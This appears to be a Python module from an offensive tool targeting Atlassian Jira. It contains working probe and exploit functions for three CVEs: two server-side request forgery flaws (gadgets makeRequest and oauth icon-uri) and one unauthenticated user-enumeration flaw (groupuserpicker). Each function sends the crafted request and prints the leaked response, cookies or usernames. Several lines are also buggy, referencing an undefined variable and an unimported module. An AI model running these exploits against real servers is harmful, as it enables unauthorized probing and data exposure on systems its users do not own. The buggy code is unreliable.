#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from .recon import request, isjira, getversion, uparse

# CVE-2019-8451
def cve2019_8451(target, ssrf='https://google.com'):
	target = uparse(target)
	# http://host:port/plugins/servlet/gadgets/makeRequest?url=http://{}:{}@{}'.format(host, port, target)
	payload = target + "/plugins/servlet/gadgets/makeRequest?url=" + target + '@' + ssrf
	res, response = request(payload)

	if '"rc":200' in response and res.status_code == 200 and 'set-cookie' in response.content:
		print("[+] Success: Target is vulnerable!")
		print("CONTENTS:", response.content, sep="\n")
	elif res.status_code != 200:
		print("Something went wrong! (STATUS {})".format(r.status_code))
		if res.status_code == 302:
			print("HTTP request got redirected. Set this instead: " + r.headers['Location'])
	else:
		print("Target doesn't seems to be vulnerable. [CVE-2019-8451]")

# CVE-2017-9506
def cve2017_9506(target):
	target = uparse(target)
	test_ssrf_url = "https://www.google.com"
	payload = target + "/plugins/servlet/oauth/users/icon-uri?consumerUri=" + test_ssrf_url
	res, response = request(payload)

	if res.status_code == 200 and 'googlelogo' in response.content:
		print("[+] Success: Target is vulnerable!")
		print('X-AUSERNAME: {}'.format(response.headers.get('X-AUSERNAME')))
		print("CONTENTS:", response.content, sep="\n")
	else:
		print("Target doesn't seems to be vulnerable. [CVE-2017-9506]")

# CVE-2019-8449
def cve2019_8449(target):
	target = uparse(target)
	dom = target + "/rest/api/latest/groupuserpicker"
	try:
		query = input("[>] Enter search query: [required] (e.g. admin) => ")
		maxResults = input("\n[>] Enter the number of maximum results to fetch: (50) => ")
		fieldId = input("\n[>] Enter the fieldId to fetch: => ")
		projectId = input("\n[>] Enter the projectId to fetch: => ")
		issueTypeId = input("\n[>] Enter the issueTypeId to fetch: => ")
	except KeyboardInterrupt:
		print('Interrupted.')
		quit()
	payload = {
		'query': query, 
		'maxResults': maxResults, 
		'showAvatar': 'true', 
		'fieldId': fieldId, 
		'projectId': projectId, 
		'issueTypeId': issueTypeId, 
		'avatarSize': 'xsmall', 
		'caseInsensitive': 'false', 
		'excludeConnectAddons': 'false'
	}

	try:
		r = requests.get(dom, params=payload)
		response = r.json()
	except:
		print("Target doesn't seems to be vulnerable. [CVE-2019-8449]")
		quit()

	print("CONTENTS:", response.content, sep="\n")